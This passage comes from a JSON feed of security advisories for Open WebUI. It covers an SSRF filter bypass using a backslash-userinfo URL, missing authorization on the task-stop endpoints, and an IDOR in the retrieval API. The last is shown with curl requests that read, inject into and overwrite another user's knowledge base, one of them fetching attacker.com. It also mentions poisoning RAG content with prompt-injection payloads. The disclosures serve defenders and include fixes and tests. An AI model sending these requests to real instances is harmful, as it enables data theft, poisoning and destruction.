-\u003e bool:\n    \"\"\"\n    Stand-in for python-validators url(): True if string looks like http(s) URL with host.\n    \"\"\"\n    try:\n        u = url.strip()\n        if not u:\n            return False\n        p = urllib.parse.urlparse(u)\n        if p.scheme not in (\"http\", \"https\"):\n            return False\n        if not p.netloc:\n            return False\n        return True\n    except Exception:\n        return False\n\n\ndef _ipv4_private(ip: str) -\u003e bool:\n    try:\n        a = ipaddress.ip_address(ip)\n        return a.version == 4 and a.is_private\n    except ValueError:\n        return False\n\n\ndef _ipv6_private(ip: str) -\u003e bool:\n    try:\n        a = ipaddress.ip_address(ip)\n        return a.version == 6 and a.is_private\n    except ValueError:\n        return False\n\n\ndef validate_url(url: Union[str, Sequence[str]]):\n    if isinstance(url, str):\n        if not _validators_url_accept(url):\n            raise ValueError(INVALID_URL)\n\n        parsed_url = urllib.parse.urlparse(url)\n\n        # Protocol validation - only allow http/https\n        if parsed_url.scheme not in [\"http\", \"https\"]:\n            log.warning(\n                f\"Blocked non-HTTP(S) protocol: {parsed_url.scheme} in URL: {url}\"\n            )\n            raise ValueError(INVALID_URL)\n\n        # Blocklist check using unified filtering logic\n        if WEB_FETCH_FILTER_LIST:\n            if not is_string_allowed(url, WEB_FETCH_FILTER_LIST):\n                log.warning(f\"URL blocked by filter list: {url}\")\n                raise ValueError(INVALID_URL)\n\n        if not ENABLE_RAG_LOCAL_WEB_FETCH:\n            # Local web fetch is disabled, filter out any URLs that resolve to private IP addresses\n            parsed_url = urllib.parse.urlparse(url)\n            # Get IPv4 and IPv6 addresses\n            ipv4_addresses, ipv6_addresses = resolve_hostname(parsed_url.hostname)\n            # Check if any of the resolved addresses are private\n            # This is technically still vulnerable to DNS rebinding attacks, as we don't control WebBaseLoader\n            for ip in ipv4_addresses:\n                if _ipv4_private(ip):\n                    raise ValueError(INVALID_URL)\n            for ip in ipv6_addresses:\n                if _ipv6_private(ip):\n                    raise ValueError(INVALID_URL)\n        return True\n    elif isinstance(url, Sequence):\n        return all(validate_url(u) for u in url)\n    else:\n        return False\n\nif __name__ == \"__main__\":\n    logging.basicConfig(level=logging.INFO)\n    # url = \"https://127.0.0.1:6666\\@1.1.1.1\"\n    url = \"https://127.0.0.1:6666\"\n    validate_url(url)\n    response = requests.get(url)\n    print(response.text)\n\n```\nAs you can see, the current check on 127.0.0.1:6666 successfully identified it as an internal network IP and blocked it.\n\n\u003cimg width=\"1428\" height=\"273\" alt=\"QQ20260322-203503-22-4\" src=\"https://github.com/user-attachments/assets/cf29b639-d4fe-409e-a516-2424d608739f\" /\u003e\n\nHowever, for https://127.0.0.1:6666\\@1.1.1.1/, the hostname extracted by validate_url is 1.1.1.1, which is considered a public IP address and therefore passes validation. In reality, this URL is being used to request the internal IP address 127.0.0.1:6666, resulting in an SSRF bypass.\n\n\u003cimg width=\"2255\" height=\"786\" alt=\"QQ20260322-203750-22-5\" src=\"https://github.com/user-attachments/assets/050bc6a4-760f-4d7a-8b52-056778097cd1\" /\u003e\n\n### PoC\n```\nhttp://127.0.0.1:6666\\@baidu.com\n```\n\n### Impact\nSSRF","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-14T20:27:00.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-8w7q-q5jp-jvgx","https://github.com/open-webui/open-webui/releases/tag/v0.9.0","https://nvd.nist.gov/vuln/detail/CVE-2026-45400","https://github.com/advisories/GHSA-8w7q-q5jp-jvgx"],"source_kind":"github","identifiers":["GHSA-8w7q-q5jp-jvgx","CVE-2026-45400"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-14T21:00:17.481Z","updated_at":"2026-09-03T03:03:09.087Z","epss_percentage":0.00292,"epss_percentile":0.21148,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04dzdxLXE1anAtanZneM4ABW5F","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS04dzdxLXE1anAtanZneM4ABW5F","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.5","vulnerable_version_range":"\u003c= 0.9.4"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04dzdxLXE1anAtanZneM4ABW5F/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS04ampwLXIydzItNHYyMs4ABW5E","url":"https://github.com/advisories/GHSA-8jjp-r2w2-4v22","title":"Open WebUI: Low-privilege authenticated users can enumerate and stop global background tasks, causing system-wide chat disruption","description":"### Summary\nAny authenticated user with low privileges can enumerate active background tasks across the system and stop tasks belonging to other users via the GET /api/tasks and POST /api/tasks/stop/{task_id} methods. This allows a casual user to disrupt system-wide chat usage by continuously canceling other users' active tasks. This is a real authorization vulnerability affecting integrity and usability in multi-user deployments.\n\n\n### Details\nOpen WebUI exposes `GET /api/tasks` and `POST /api/tasks/stop/{task_id}` to any verified user. These endpoints operate on a global task namespace and accept raw `task_id` values without checking whether the task belongs to the current caller.\n\nAs a result, a normal authenticated user can enumerate active global task IDs and stop tasks belonging to other users.\n\nRoot cause:\n\n1. Route authorization is too weak.\n\nIn `backend/open_webui/main.py`, both endpoints only require `get_verified_user`:\n\n```python\n@app.post('/api/tasks/stop/{task_id}')\nasync def stop_task_endpoint(request: Request, task_id: str, user=Depends(get_verified_user)):\n    result = await stop_task(request.app.state.redis, task_id)\n\n@app.get('/api/tasks')\nasync def list_tasks_endpoint(request: Request, user=Depends(get_verified_user)):\n    return {'tasks': await list_tasks(request.app.state.redis)}\n```\n\n`get_verified_user` accepts both `user` and `admin` roles in `backend/open_webui/utils/auth.py`.\n\n2. The helper operates on a global namespace.\n\nIn `backend/open_webui/tasks.py`, task listing is global:\n\n```python\nasync def list_tasks(redis):\n    if redis:\n        return await redis_list_tasks(redis)\n    return list(tasks.keys())\n```\n\nIn `backend/open_webui/tasks.py`, task stopping is by raw `task_id`:\n\n```python\nasync def stop_task(redis, task_id: str):\n    if redis:\n        item_id = await redis.hget(REDIS_TASKS_KEY, task_id)\n        await redis_send_command(redis, {'action': 'stop', 'task_id': task_id})\n        await redis_cleanup_task(redis, task_id, item_id or None)\n```\n\nThere is no owner check, no `user_id` check, and no mapping from `task_id` back to the current caller before stop or cleanup.\n\nThis also appears unintended because the codebase already has a scoped route, `GET /api/tasks/chat/{chat_id}`, which checks whether the chat belongs to the current user before returning task IDs.\n\nRelevant code references:\n- `backend/open_webui/main.py:1975`\n- `backend/open_webui/main.py:1984`\n- `backend/open_webui/main.py:1989`\n- `backend/open_webui/tasks.py:127`\n- `backend/open_webui/tasks.py:145`\n- `backend/open_webui/utils/auth.py:415`\n\nSuggested remediation:\n- Store task ownership metadata such as `user_id` and `chat_id`, then enforce owner-only access for non-admin users\n- Suggested implementation locations:\n  - `backend/open_webui/main.py`: add authentication checks for `/api/tasks` and `/api/tasks/stop/{task_id}`\n  - `backend/open_webui/tasks.py`: add support for storing/querying task ownership metadata such as `user_id` and `chat_id`, and support owner-scoped listing/stopping\n\n\n\n### PoC\nPreconditions:\n\n- Default `main` branch deployment\n- Authentication enabled\n- Two normal user accounts, or any multi-user deployment where the attacker has one authenticated non-admin account\n- At least one task actively running for another user\n\nThis does not require any weakened security settings.\n\nPoC objective:\n\n1. Show that a non-admin user can see global active task IDs that are not their own\n2. Show that the same user can stop another user's active task\n\nReproduction steps:\n\n#### Step 1. Victim starts a long-running task\n\nUsing the UI, User A starts a long response generation or another background task and leaves it running.\n\nExpected security model:\nUser B should not be able to see or control User A's task.\n\n#### Step 2. Attacker enumerates global task IDs\n\nUsing User B's authenticated token:\n\n```bash\ncurl -i -H \"Authorization: Bearer \u003cUSER_B_TOKEN\u003e\" http://\u003copen-webui-host\u003e/api/tasks\n```\n\nExpected result:\n\n- only User B's own task IDs should be returned, or\n- the endpoint should be admin-only\n\nActual result:\nthe response returns the global active task list.\n\nExample response shape:\n\n```json\n{\"tasks\":[\"\u003ctask-id-a\u003e\",\"\u003ctask-id-b\u003e\"]}\n```\n\nThis exposes task IDs belonging to other users.\n\n#### Step 3. Attacker stops a foreign task\n\nPick a task ID that belongs to User A and send:\n\n```bash\ncurl -i -X POST -H \"Authorization: Bearer \u003cUSER_B_TOKEN\u003e\" http://\u003copen-webui-host\u003e/api/tasks/stop/\u003cFOREIGN_TASK_ID\u003e\n```\n\nExpected result:\n\n- `403 Forbidden`, or\n- `404 Not Found` for non-owned tasks, or\n- admin-only access\n\nActual result:\nthe server accepts the request and attempts to stop the foreign task.\n\nExample response shape:\n\n```json\n{\"status\":true,\"message\":\"Task \u003cFOREIGN_TASK_ID\u003e stopped.\"}\n```\n\n#### Step 4. Observe boundary violation\n\nUser A's running task is interrupted or disappears from the active task set even though User B does not own it.\n\nWhat actions become possible that should not be possible:\n\n- enumerate globally active task IDs across users\n- cancel another user's in-progress generation or background work\n- repeat this for every returned task ID, causing broad cross-user disruption\n\nCopy-paste PoC summary:\n\n1. Enumerate all active tasks as a normal non-admin user\n\n```bash\ncurl -s -H \"Authorization: Bearer \u003cUSER_B_TOKEN\u003e\" http://\u003copen-webui-host\u003e/api/tasks\n```\n\n2. Stop a task that does not belong to that user\n\n```bash\ncurl -s -X POST -H \"Authorization: Bearer \u003cUSER_B_TOKEN\u003e\" http://\u003copen-webui-host\u003e/api/tasks/stop/\u003cFOREIGN_TASK_ID\u003e\n```\n\n### Impact\nType of vulnerability:\nbroken object-level authorization affecting a global runtime control-plane endpoint.\n\nWho is impacted:\n\n- all users in a multi-user Open WebUI deployment\n- any user currently running a background task, especially chat generation tasks\n- administrators indirectly, because normal users can disrupt system-wide usage without admin privileges\n\nDirect impact:\n\n- cross-user task ID disclosure\n- cross-user task cancellation\n\nPractical impact:\n\n- interruption of long-running chat responses\n- interruption of background indexing or ingestion tasks associated with shared runtime jobs\n- one ordinary authenticated low-privilege user can continuously poll `/api/tasks` and immediately cancel every newly created active task\n- with a simple loop or script, this becomes a practical persistent denial-of-service against chat usage for all users on the instance\n- in a multi-user deployment, normal users may be unable to complete any chat generation while the attacker continues polling and cancelling tasks\n\nWhy severity is meaningful:\n\n- privileges required: low, only an authenticated non-admin account\n- scope: cross-user\n- impact class: integrity and availability\n- exploitation complexity: low once logged in\n\nThis is not full account takeover or privilege escalation, but it enables platform-wide operational disruption from a low-privilege account. In practice, sustained exploitation can make chat functionality effectively unusable for other users on the system.\n\n## Resolution\n\nFixed in commit [e7ff4768f](https://github.com/open-webui/open-webui/commit/e7ff4768f8ffe1924b4576381c9e45e8a64350e4) ([#23454](https://github.com/open-webui/open-webui/pull/23454), \"Add ownership checks to global task endpoints\"), first released in **v0.9.0** (Apr 2026).\n\nThe fix takes a simpler approach than per-task ownership tracking, which would have required a schema change to attribute every task to a `user_id`:\n\n- `GET /api/tasks` and `POST /api/tasks/stop/{task_id}` are restricted to admin-only via `Depends(get_admin_user)`. Cross-user enumeration and termination are no longer reachable from a non-admin account.\n- A new scoped `POST /api/tasks/chat/{chat_id}/stop` endpoint covers the legitimate non-admin use case (a user stopping their own in-progress generation), reusing the same chat-ownership check the existing `GET /api/tasks/chat/{chat_id}` already enforces.\n\nCVE-2025-63681 was a prior disclosure of the same authorization gap against v0.6.33; the fix in v0.9.0 also resolves that.\n\nUsers on `\u003e= 0.9.0` are not affected.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-14T20:26:49.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.1,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-8jjp-r2w2-4v22","https://github.com/open-webui/open-webui/pull/23454","https://github.com/open-webui/open-webui/commit/e7ff4768f8ffe1924b4576381c9e45e8a64350e4","https://github.com/open-webui/open-webui/releases/tag/v0.9.0","https://nvd.nist.gov/vuln/detail/CVE-2026-45399","https://github.com/advisories/GHSA-8jjp-r2w2-4v22"],"source_kind":"github","identifiers":["GHSA-8jjp-r2w2-4v22","CVE-2026-45399"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-14T21:00:17.481Z","updated_at":"2026-09-03T03:03:09.088Z","epss_percentage":0.0027,"epss_percentile":0.18598,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04ampwLXIydzItNHYyMs4ABW5E","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS04ampwLXIydzItNHYyMs4ABW5E","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.0","vulnerable_version_range":"\u003c= 0.8.12"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04ampwLXIydzItNHYyMs4ABW5E/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS00ZzM3LTdwMmMtMzhyOc4ABW5D","url":"https://github.com/advisories/GHSA-4g37-7p2c-38r9","title":"Open WebUI Vulnerable to IDOR: Retrieval API Bypasses Knowledge Base Access Controls","description":"# IDOR: Retrieval API Bypasses Knowledge Base Access Controls\n\n**Author:** Andrew Orr \u003caorr@tenable.com\u003e\n\n## Summary\n\n`_validate_collection_access()` ([PR #22109](https://github.com/open-webui/open-webui/pull/22109)) checks the `user-memory-*` and `file-*` collection name prefixes but does not check knowledge base collections, which use raw UUIDs as collection names. Any authenticated user who knows a private knowledge base UUID can read its content through the retrieval query endpoints, even though the knowledge API correctly denies that user access. The same gap affects the retrieval write endpoints (`/process/text`, `/process/file`, `/process/files/batch`, `/process/web`, `/process/youtube`), allowing an attacker to inject content into or overwrite another user's knowledge base.\n\nReproduced on `main` at commit `4d058a125` (v0.8.11) on March 26, 2026.\n\n## Severity\n\n- CWE-639: Authorization Bypass Through User-Controlled Key\n- CVSS 3.1: `7.5 (AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)` -- `AC:H` because exploitation requires knowing a target UUID; `I:H` and `A:H` because the write path allows poisoning or destruction of another user's knowledge base\n\n## Default Configuration Reachability\n\nReachable in default configuration. All affected endpoints require only `get_verified_user`, not `get_admin_user`, so any non-admin account in a typical multi-user deployment can reach them. The only prerequisite beyond authentication is knowledge of a target knowledge base UUID, which is reflected in the `AC:H` score. However, KB UUIDs are stable identifiers that leak through normal usage rather than secrets (see Prerequisites below).\n\n## Root Cause\n\nKnowledge base embeddings are stored in vector DB collections named with the knowledge base's UUID (e.g., `550e8400-e29b-41d4-a716-446655440000`). The `_validate_collection_access` function only blocks two specific prefixes:\n\n```python\n# backend/open_webui/routers/retrieval.py lines 2330-2355\ndef _validate_collection_access(collection_names: list[str], user) -\u003e None:\n    if user.role == \"admin\":\n        return\n\n    for name in collection_names:\n        if name.startswith(\"user-memory-\") and name != f\"user-memory-{user.id}\":\n            raise HTTPException(\n                status_code=status.HTTP_403_FORBIDDEN,\n                detail=ERROR_MESSAGES.ACCESS_PROHIBITED,\n            )\n        elif name.startswith(\"file-\"):\n            file_id = name[len(\"file-\"):]\n            if not has_access_to_file(\n                file_id=file_id,\n                access_type=\"read\",\n                user=user,\n            ):\n                raise HTTPException(\n                    status_code=status.HTTP_403_FORBIDDEN,\n                    detail=ERROR_MESSAGES.ACCESS_PROHIBITED,\n                )\n        # No else clause -- knowledge base UUIDs pass through unchecked\n```\n\nKnowledge base UUIDs do not match either prefix, so the function returns without raising an exception. The query then executes against the vector DB with no further authorization check.\n\n## Vulnerable Endpoints\n\n### Read Endpoints\n\nBoth retrieval query endpoints accept a collection name and call `_validate_collection_access` as their sole authorization gate:\n\n1. `POST /api/v1/retrieval/query/doc` (line 2367) -- single `collection_name`\n2. `POST /api/v1/retrieval/query/collection` (line 2432) -- list of `collection_names`\n\n### Write Endpoints\n\nThe following endpoints accept a `collection_name` parameter and write to the target collection without checking whether the caller owns it:\n\n3. `POST /api/v1/retrieval/process/text` (line 1777) -- appends attacker-controlled content to the target collection\n4. `POST /api/v1/retrieval/process/file` (line 1528) -- validates ownership of the uploaded file but not the destination collection\n5. `POST /api/v1/retrieval/process/files/batch` (line 2578) -- same as above for multiple files\n6. `POST /api/v1/retrieval/process/web` and `POST /api/v1/retrieval/process/youtube` (lines 1810-1811) -- same handler; `overwrite` defaults to `true`, so targeting an existing knowledge base deletes and replaces it\n\n| Endpoint | Read | Write | Overwrite | Access Check |\n|----------|------|-------|-----------|--------------|\n| /query/doc | Yes | -- | -- | Prefix-only (bypassed) |\n| /query/collection | Yes | -- | -- | Prefix-only (bypassed) |\n| /process/text | -- | Yes | -- | None |\n| /process/web | -- | Yes | Yes (default) | None |\n| /process/youtube | -- | Yes | Yes (default) | None (same handler as /process/web) |\n| /process/file | -- | Yes | -- | File only, not collection |\n| /process/files/batch | -- | Yes | -- | File only, not collection |\n\n## Proof of Concept\n\n**Security boundary crossed:** The knowledge base access control system (ownership checks, group-based access grants) is bypassed at the retrieval layer. A non-admin user who knows a private knowledge base UUID can read it, append attacker-controlled content to it, or destroy and replace it through the retrieval API, even though the knowledge API correctly denies the same user access to the same resource.\n\n`open-webui-idor-poc.sh` provides a self-contained Docker lab that stands up the target environment and tests every vulnerable endpoint listed above. See the comments at the top of that file for setup, usage, and configuration options.\n\n### Prerequisites\n\n- Attacker has an authenticated (non-pending) account on the target instance.\n- A victim user has created a private knowledge base containing sensitive documents.\n- Attacker knows the victim's knowledge base UUID. V4 UUIDs are not guessable, but they are stable identifiers that leak through normal platform usage:\n  - **Access revocation:** A user learns a KB UUID through a shared workspace or group, loses access, and finds the retrieval API still honors the stale UUID. The knowledge API correctly revokes access at request time (`access_grants.py:549-558` dynamically queries current group memberships), but the retrieval API has no equivalent check.\n  - **Model metadata:** When a model is shared with a group, `GET /api/models/list` returns the full `meta.knowledge` array -- including KB UUIDs -- to every user with access to the model, even if they have no access to the referenced knowledge bases (`models.py:58-130`).\n  - **URL leakage:** KB UUIDs appear in browser URLs (`/workspace/knowledge/{id}`, `Knowledge.svelte:260`) and can leak through shared links, browser history, Referrer headers, or proxy logs.\n  - **RAG citation metadata:** KB UUIDs are stored as `source.id` in chat message sources (`middleware.py:1950-1965`, `socket/main.py:880-897`). Shared chats return these sources unfiltered (`chats.py:815-830`).\n\n### Read: Extract Private KB Content\n\nAuthenticate as the attacker:\n\n```bash\nTOKEN=$(curl -s -X POST https://open-webui/api/v1/auths/signin \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"email\": \"attacker@example.com\", \"password\": \"password\"}' \\\n  | jq -r '.token')\n```\n\n**Control request:** the knowledge API correctly blocks the attacker:\n\n```bash\ncurl -s https://open-webui/api/v1/knowledge/\u003cvictim_kb_uuid\u003e \\\n  -H \"Authorization: Bearer $TOKEN\"\n```\n\n```json\n{\"detail\": \"You do not have permission to access this resource.\"}\n```\n\n**Exploit request:** the retrieval API returns the same KB's content without authorization:\n\n```bash\ncurl -s -X POST https://open-webui/api/v1/retrieval/query/doc \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"collection_name\": \"\u003cvictim_kb_uuid\u003e\",\n    \"query\": \"confidential\",\n    \"k\": 50\n  }'\n```\n\nExpected result when vulnerable: the server returns matching document chunks from the victim's private knowledge base, including text content and metadata (source filenames, file IDs, hashes).\n\nThe `/query/collection` endpoint accepts a list of collection names and behaves identically:\n\n```bash\ncurl -s -X POST https://open-webui/api/v1/retrieval/query/collection \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"collection_names\": [\"\u003cvictim_kb_uuid\u003e\"],\n    \"query\": \"confidential\",\n    \"k\": 50\n  }'\n```\n\n### Write: File Injection via /process/file\n\nThe `/process/file` endpoint validates that the attacker owns the uploaded file but does not validate the target `collection_name`. The attacker uploads a file under their own account, then processes it into the victim's collection:\n\n```bash\n# Upload attacker's file\nFILE_ID=$(curl -s -X POST https://open-webui/api/v1/files/ \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -F \"file=@payload.txt;type=text/plain\" \\\n  | jq -r '.id')\n\n# Process it into the victim's KB collection\ncurl -s -X POST https://open-webui/api/v1/retrieval/process/file \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \"{\n    \\\"file_id\\\": \\\"$FILE_ID\\\",\n    \\\"collection_name\\\": \\\"\u003cvictim_kb_uuid\u003e\\\"\n  }\"\n```\n\n### Write: Batch File Injection via /process/files/batch\n\nSame pattern as above but accepts multiple files in a single request:\n\n```bash\n# Get the full file object for the attacker's uploaded file\nFILE_OBJ=$(curl -s https://open-webui/api/v1/files/$FILE_ID \\\n  -H \"Authorization: Bearer $TOKEN\")\n\n# Batch-process into the victim's KB collection\ncurl -s -X POST https://open-webui/api/v1/retrieval/process/files/batch \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \"{\n    \\\"files\\\": [$FILE_OBJ],\n    \\\"collection_name\\\": \\\"\u003cvictim_kb_uuid\u003e\\\"\n  }\"\n```\n\n### Write: Text Injection via /process/text\n\n`/process/text` appends attacker-controlled content to an existing knowledge base collection:\n\n```bash\ncurl -s -X POST https://open-webui/api/v1/retrieval/process/text \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"name\": \"injected.txt\",\n    \"content\": \"INJECTED BY ATTACKER: attacker-controlled content\",\n    \"collection_name\": \"\u003cvictim_kb_uuid\u003e\"\n  }'\n```\n\nThe PoC then verifies that the injected text is returned by a follow-up query against the victim collection.\n\n### Write: YouTube Transcript Replacement via /process/youtube\n\n`/process/youtube` uses the same handler as `/process/web` with the same `overwrite=true` default. This request replaces the victim's collection with the fetched transcript:\n\n```bash\ncurl -s -X POST https://open-webui/api/v1/retrieval/process/youtube \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"url\": \"https://www.youtube.com/watch?v=dQw4w9WgXcQ\",\n    \"collection_name\": \"\u003cvictim_kb_uuid\u003e\"\n  }'\n```\n\n### Write: Data Destruction via /process/web\n\n`/process/web` defaults to `overwrite=true`, which deletes the existing collection before writing. The explicit query string below makes the destructive behavior obvious:\n\n```bash\ncurl -s -X POST \"https://open-webui/api/v1/retrieval/process/web?overwrite=true\" \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"url\": \"https://attacker.com/payload.html\",\n    \"collection_name\": \"\u003cvictim_kb_uuid\u003e\"\n  }'\n```\n\n## Impact\n\n- **Confidentiality**: Any authenticated user can read private knowledge base contents belonging to other users on the instance.\n- **Integrity**: Attacker-controlled content can be injected into another user's knowledge base, poisoning downstream RAG results. Injected prompt-injection payloads would be passed to the model when the victim queries the knowledge base.\n- **Availability**: `/process/web` and `/process/youtube` default to `overwrite=true`, letting an attacker delete and replace a victim's entire knowledge base in a single request.\n\n## Remediation\n\nTwo changes are needed:\n\n1. Add a `permission` parameter to `_validate_collection_access`, use it for both `file-*` and knowledge base checks, and add a knowledge base ownership/access check for collection names that do not match the existing prefixes. `AccessGrants.has_access` already resolves group memberships internally when `user_group_ids` is omitted, matching the pattern used throughout `knowledge.py`.\n\n2. The affected write endpoints must call `_validate_collection_access` with `permission=\"write\"` before operating on the provided `collection_name`.\n\n```diff\n--- a/backend/open_webui/routers/retrieval.py\n+++ b/backend/open_webui/routers/retrieval.py\n@@ -39,4 +39,5 @@\n from open_webui.models.files import FileModel, FileUpdateForm, Files\n from open_webui.utils.access_control.files import has_access_to_file\n from open_webui.models.knowledge import Knowledges\n+from open_webui.models.access_grants import AccessGrants\n from open_webui.storage.provider import Storage\n\n@@ -2330,26 +2331,39 @@\n-def _validate_collection_access(collection_names: list[str], user) -\u003e None:\n+def _validate_collection_access(collection_names: list[str], user, permission: str = \"read\") -\u003e None:\n     if user.role == \"admin\":\n         return\n\n     for name in collection_names:\n         if name.startswith(\"user-memory-\") and name != f\"user-memory-{user.id}\":\n             raise HTTPException(\n                 status_code=status.HTTP_403_FORBIDDEN,\n                 detail=ERROR_MESSAGES.ACCESS_PROHIBITED,\n             )\n         elif name.startswith(\"file-\"):\n             file_id = name[len(\"file-\"):]\n-            if not has_access_to_file(\n-                file_id=file_id,\n-                access_type=\"read\",\n-                user=user,\n-            ):\n+            if not has_access_to_file(\n+                file_id=file_id,\n+                access_type=permission,\n+                user=user,\n+            ):\n                 raise HTTPException(\n                     status_code=status.HTTP_403_FORBIDDEN,\n                     detail=ERROR_MESSAGES.ACCESS_PROHIBITED,\n                 )\n+        else:\n+            knowledge = Knowledges.get_knowledge_by_id(id=name)\n+            if knowledge and knowledge.user_id != user.id:\n+                if not AccessGrants.has_access(\n+                    user_id=user.id,\n+                    resource_type=\"knowledge\",\n+                    resource_id=name,\n+                    permission=permission,\n+                ):\n+                    raise HTTPException(\n+                        status_code=status.HTTP_403_FORBIDDEN,\n+                        detail=ERROR_MESSAGES.ACCESS_PROHIBITED,\n+                    )\n```\n\nThe existing read callers (`/query/doc`, `/query/collection`) use the default `permission=\"read\"` and require no change. Each affected write endpoint needs a validation call after `collection_name` is resolved:\n\n`/process/text` (line 1777):\n\n```diff\n@@ -1783,5 +1783,6 @@\n     collection_name = form_data.collection_name\n     if collection_name is None:\n         collection_name = calculate_sha256_string(form_data.content)\n+    _validate_collection_access([collection_name], user, permission=\"write\")\n\n     docs = [\n```\n\n`/process/web` and `/process/youtube` (lines 1810-1811, same handler):\n\n```diff\n@@ -1824,5 +1824,6 @@\n             collection_name = form_data.collection_name\n             if not collection_name:\n                 collection_name = calculate_sha256_string(form_data.url)[:63]\n+            _validate_collection_access([collection_name], user, permission=\"write\")\n\n             if not request.app.state.config.BYPASS_WEB_SEARCH_EMBEDDING_AND_RETRIEVAL:\n```\n\n`/process/file` (line 1528):\n\n```diff\n@@ -1548,6 +1548,7 @@\n             collection_name = form_data.collection_name\n             if collection_name is None:\n                 collection_name = f\"file-{file.id}\"\n+            _validate_collection_access([collection_name], user, permission=\"write\")\n\n             if form_data.content:\n```\n\n`/process/files/batch` (line 2578):\n\n```diff\n@@ -2593,3 +2593,4 @@\n     collection_name = form_data.collection_name\n+    _validate_collection_access([collection_name], user, permission=\"write\")\n\n     file_results: List[BatchProcessFilesResult] = []\n```\n\n## Regression Test\n\nA regression test should verify that `_validate_collection_access` blocks non-owners from accessing knowledge base collections:\n\n```python\nfrom unittest.mock import MagicMock, patch\n\nimport pytest\nfrom fastapi import HTTPException\n\nfrom open_webui.routers.retrieval import _validate_collection_access\n\n\ndef test_validate_collection_access_blocks_non_owner_read():\n    victim_kb_id = \"550e8400-e29b-41d4-a716-446655440000\"\n    attacker = MagicMock()\n    attacker.id = \"attacker-user-id\"\n    attacker.role = \"user\"\n\n    mock_knowledge = MagicMock()\n    mock_knowledge.user_id = \"victim-user-id\"\n\n    with patch(\n        \"open_webui.routers.retrieval.Knowledges.get_knowledge_by_id\",\n        return_value=mock_knowledge,\n    ), patch(\n        \"open_webui.routers.retrieval.AccessGrants.has_access\",\n        return_value=False,\n    ):\n        with pytest.raises(HTTPException) as exc_info:\n            _validate_collection_access([victim_kb_id], attacker)\n        assert exc_info.value.status_code == 403\n\n\ndef test_validate_collection_access_blocks_non_owner_write():\n    victim_kb_id = \"550e8400-e29b-41d4-a716-446655440000\"\n    attacker = MagicMock()\n    attacker.id = \"attacker-user-id\"\n    attacker.role = \"user\"\n\n    mock_knowledge = MagicMock()\n    mock_knowledge.user_id = \"victim-user-id\"\n\n    with patch(\n        \"open_webui.routers.retrieval.Knowledges.get_knowledge_by_id\",\n        return_value=mock_knowledge,\n    ), patch(\n        \"open_webui.routers.retrieval.AccessGrants.has_access\",\n        return_value=False,\n    ):\n        with pytest.raises(HTTPException) as exc_info:\n            _validate_collection_access(\n                [victim_kb_id], attacker, permission=\"write\"\n            )\n        assert exc_info.value.status_code == 403\n```\n\nFor additional coverage, maintainers may want an integration test that creates a knowledge base as one user and confirms that a second user's retrieval query is rejected end-to-end.\n\n## AI Disclosure\n\nAI assistance was used to help analyze the code paths, develop the PoC workflow, and draft this report.\n\n## Attachments\n\n[open-webui-idor-poc.log](https://github.com/user-attachments/files/26283199/open-webui-idor-poc.log)\n[open-webui-idor-poc.sh](https://github.com/user-attachments/files/26283201/open-webui-idor-poc.sh)\n\n## Tenable's Disclosure Policy\n\nTenable follows a 90-day vulnerability disclosure policy. That means, even though we prefer coordinated disclosure, we'll issue an advisory on June 24, 2026 with or without a patch. Alternatively, any uncoordinated vendor release of a patch or advisory to any customers before the 90-day deadline will be considered public disclosure, and Tenable may release an advisory prior to the coordinated disclosure date. Please read the full details of our policy here: https://static.tenable.com/research/tenable-vulnerability-disclosure-policy.pdf\n \nThank you for taking the time to read this. We'd greatly appreciate it if you'd acknowledge receipt of this report. If you have any questions we'd be happy to address 